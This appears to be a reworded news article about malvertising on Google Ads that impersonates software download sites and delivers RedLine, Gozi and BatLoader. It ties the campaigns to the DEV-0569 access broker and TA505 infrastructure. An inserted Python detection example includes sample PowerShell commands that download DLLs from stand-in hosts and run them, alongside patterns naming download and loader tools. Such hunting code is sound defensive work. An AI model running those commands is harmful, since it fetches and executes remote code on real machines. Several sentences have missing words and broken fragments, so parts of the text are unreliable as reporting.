Google Ads are being used by ransomware access brokers to breach your network.

DEV-0569 is a threat actor that uses Google Ads to spread malware, steal victims' passwords and then breach networks in order to launch ransomware attacks.

Over the past few weeks, cybersecurity experts and have demonstrated how Google search results have become a hotbed for malicious ads pushing malware.

These advertisements pretend to be the sites of popular programs such as LightShot, Rufus, FileZilla, LibreOffice, AnyDesk, Awesome Miner, TradingView and WinRAR.

[Image: Google ads promoting fake software sites push malware. Source: Researchers/BleepingComputer]

Clicking the ads takes you to download portals and replicas of legitimate software sites.

[Image: Fake Rufus download site. Source: BleepingComputer]

Clicking the download links typically delivers an MSI file that installs malware; which malware is installed depends on the campaign.

RedLine Stealer and Gozi/Ursnif are just some of the malware found in these campaigns; Vidar and possibly Cobalt Strike have also been installed.

Although many threat actors use Google Ads to spread malware, two campaigns are worth mentioning because they have previously been linked to ransomware.

Google Ads to Ransomware Attacks

In February 2022, a malware distribution campaign used SEO poisoning to rank websites pretending to offer popular software.

Users who downloaded software from these sites executed BatLoader, which launched a multistage infection process that eventually gave the attackers access to the victims' networks.

Microsoft later reported that the threat actors responsible for BatLoader (tracked as DEV-0569) had started to advertise their sites using Google Ads. Microsoft stated that the infections eventually led to ransomware being deployed onto breached networks.

“Recent activity from the threat actor that Microsoft monitors as DEV-0569 has led to the deployment of Royal ransomware, which was first discovered in September 2022.”

Research suggests that DEV-0569 acts as an initial access broker, using its malware distribution network to break into corporate networks. This access is then sold to other malicious actors, such as the Royal ransomware operation, or used in attacks.

Although Microsoft did not share any URLs related to these attacks, additional reports by , provided more details, including the URLs used in the BatLoader campaigns.

bitbucket[.]org/ganhack123/load/downloads
ads-check[.]com (Google Ads statistics tracking)

Fast forward to January 21, 2023, when a CronUp researcher discovered that Google Ads promoting software were leading to malware sites using infrastructure controlled by the DEV-0569 threat actor.

Unlike the campaigns Microsoft described, this campaign does not use BatLoader. Instead, it installs an information stealer (RedLine Stealer), followed by a malware downloader (Gozi/Ursnif).

In the current campaign, RedLine is used to steal passwords and cookies, while Gozi/Ursnif is used to download further malware.

Fernandez told BleepingComputer that he linked the new campaigns to DEV-0569 because they used the same Bitbucket repository and the same ads-check[.]com URL that were used in two campaigns reported in November/December 2022.

Fernandez did not see Royal ransomware or Cobalt Strike being installed. He told BleepingComputer, however, that he believes the attackers will eventually use Gozi to drop Cobalt Strike, as BatLoader did in past campaigns.

Fernandez also accessed the web panel DEV-0569 uses to monitor its malware distribution campaign and shared screenshots on Twitter. The screenshots show the legitimate programs being impersonated and the many victims around the world infected every day.

He said that it was not possible to determine how many victims the campaign had affected, as the statistics in the web panel did not allow for an estimate.

Fernandez stated that the panel data is cleaned every day. “However, there was one data point that might give an indication. It is the correlative identification of records. (It could provide an estimate value for victims, as in our case, 63576),” Fernandez told BleepingComputer.

Another campaign is linked to Clop ransomware

To make matters worse, a similar but distinct Google Ads campaign is using infrastructure previously owned by the threat group TA505.

The threat actors distribute malware via websites impersonating popular software such as AnyDesk and Slack.

This contains a list of the domains that were part of this campaign.

Once the malware is downloaded and run, it executes a PowerShell command that downloads and executes DLLs from download-cdn[. TA505 had previously downloaded a DLL from the same domain.

[Image: PowerShell script to download malware. Source: BleepingComputer]
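The behaviour described above (a PowerShell command fetching a DLL from a remote host and loading it) is the kind of thing a defender can hunt for in PowerShell script-block logs. The following is an added example, not code from the article or from any of the researchers it cites; the log entries, hostnames and match patterns are all constructed for illustration.

```python
import re

# Constructed PowerShell script-block log entries (hypothetical, not from the article).
# The first download uses a defanged "[.]" the way threat reports print indicators.
SAMPLE_SCRIPT_BLOCKS = [
    "Get-ChildItem C:\\Users\\alice\\Downloads",
    "(New-Object Net.WebClient).DownloadFile('https://download-cdn[.]example/x.dll', "
    "$env:TEMP + '\\x.dll'); rundll32 $env:TEMP\\x.dll,Start",
    "Invoke-WebRequest -Uri https://updates.example.org/tool.msi -OutFile tool.msi",
    "iwr http://cdn.example.net/a.dll -OutFile a.dll; regsvr32 /s a.dll",
    "Import-Module ActiveDirectory; Get-ADUser bob",
]

# Cmdlets and .NET calls commonly used to fetch a payload from a remote host.
DOWNLOAD_RE = re.compile(
    r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|"
    r"Start-BitsTransfer|\bcurl\b|\bwget\b", re.I)
# A DLL is referenced anywhere in the command.
DLL_RE = re.compile(r"\.dll\b", re.I)
# Native loaders or in-process loading of a library.
LOADER_RE = re.compile(
    r"rundll32|regsvr32|\[Reflection\.Assembly\]::Load|Add-Type|LoadLibrary", re.I)
URL_HOST_RE = re.compile(r"https?://([A-Za-z0-9.\-\[\]]+)", re.I)


def remote_hosts(block):
    """Return the hosts named in URLs inside a script block, with [.] re-fanged."""
    return [h.replace("[.]", ".") for h in URL_HOST_RE.findall(block)]


def score_block(block):
    """List the suspicious traits a single script block shows."""
    reasons = []
    if DOWNLOAD_RE.search(block):
        reasons.append("remote download")
    if DLL_RE.search(block):
        reasons.append("dll reference")
    if LOADER_RE.search(block):
        reasons.append("dll loader")
    return reasons


def flag_blocks(blocks):
    """Flag blocks that both download from a remote host and reference a DLL."""
    # Each finding is (index, reasons, hosts); the hosts can go to a blocklist review.
    # A plain MSI download with no DLL involvement is not flagged on its own.
    findings = []
    for i, block in enumerate(blocks):
        reasons = score_block(block)
        if "remote download" in reasons and "dll reference" in reasons:
            findings.append((i, reasons, remote_hosts(block)))
    return findings
```

Calling `flag_blocks(SAMPLE_SCRIPT_BLOCKS)` flags the two entries that download a DLL and hand it to rundll32/regsvr32, and leaves the ordinary MSI download and the admin commands alone.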

Tommy Madjar, a Proofpoint threat researcher, told BleepingComputer that the domain has changed owners in the past and is not currently being used by TA505.

Regardless of who owns the domain, many Google Ads are malicious, and they are causing problems for consumers and businesses alike.

These campaigns can be used to gain initial access to corporate networks, leading to attacks such as ransomware, data theft and disruption of company operations.

Although BleepingComputer did not contact Google for this article, Google reached out to BleepingComputer last week concerning a similar campaign distributed via Google Ads.

Google stated at that time that its policies were designed to protect brands from impersonation.

“We have strong policies that prohibit ads trying to . These include hiding the identity of advertisers and impersonating brands.” Google informed BleepingComputer that it had reviewed and removed the ads.

Google removes the ads that are to Google as well as the ones it has detected.

Unfortunately, the threat actors keep launching new ad campaigns and sites. It is a huge game of whack-a-mole, and Google does not seem to be winning.